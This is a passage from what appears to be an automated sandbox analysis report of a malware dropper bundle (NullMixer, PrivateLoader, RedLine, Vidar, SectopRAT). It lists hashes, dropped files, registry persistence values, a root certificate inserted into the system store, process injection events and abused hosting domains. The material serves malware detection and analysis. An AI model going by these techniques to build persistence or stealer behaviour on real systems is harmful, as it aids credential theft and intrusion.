SHA1 bd2a79c82540eccf13e14e657a4dd21f4a90b6f6
SHA256 8db4af0bdfe9b061291db46510b8c5a4abe0bcd0d2e3ac0dde9a21eb8fbfa372
SHA512 fe468d5bc2c39efcaa0e309b2f51ad9c66e810d7ce7687e744de4ce01f5036da02fc70159aeeb9a0a827c9d7987b9e52f2f949f1a65fef6740716904dc57c34b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1e7dc506a2b8ed7ed0fcb8d42619fe5d
SHA1 9d332b0a8724087c0e93611473b1d0e278d82301
SHA256 d91f02b5e6b1f70abf110663d378d1f655d137b7b515ab737dccc3435c9926ba
SHA512 2dc6018f38e6a66aaaf92038de692fdbca033932663adfa4320e16ca791cdddb9befe0844686a269e0dddcb5869021476283009a9e188171c2ba5a8f1361c5be

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 be0b4b1c809dc419f44b990378cbae31
SHA1 5c40c342e0375d8ca7e4cc4e1b81b7ef20a22806
SHA256 530bd3b9ec17f111b0658fddeb4585cd6bf6edb1561bdebd1622527c36a63f53
SHA512 5ce316cfe5e25b0a54ceb157dee8f85e2c7825d91a0cd5fae0500b68b85dd265903582728d4259428d2e44b561423dac1499edcf0606ac0f78e8485ce3c0af24

memory/5648-326-0x0000000000F60000-0x0000000000F66000-memory.dmp

memory/5796-332-0x0000000000A30000-0x0000000000A50000-memory.dmp

memory/5796-329-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5796-331-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5796-336-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5796-337-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5796-335-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5796-333-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5796-334-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5796-338-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5796-339-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5796-366-0x0000000140000000-0x0000000140786000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 4bc8a3540a546cfe044e0ed1a0a22a95
SHA1 5387f78f1816dee5393bfca1fffe49cede5f59c1
SHA256 f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca
SHA512 e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf

Analysis: behavioral3

Detonation Overview

Submitted

2024-12-06 12:12

Reported

2024-12-06 12:15

Platform

win7-20240903-en

Max time kernel

63s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Vidar

stealer vidar

Vidar family

vidar

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\3d1f9c2a6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\3d1f9c2a6.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zS406F7727\e4f0738cc5646a38.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.db-ip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2992 set thread context of 868 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406F7727\3d1f9c2a6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406F7727\d55cc0d45c3a05.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7AE71BD1-B3CB-11EF-A5D8-F2DF7204BD4F} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\caa4baaf544.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\6f1aa71747b4a291.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1540 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe
PID 1540 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe
PID 1540 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe
PID 1540 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe
PID 1540 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe
PID 1540 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe
PID 1540 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe
PID 2576 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
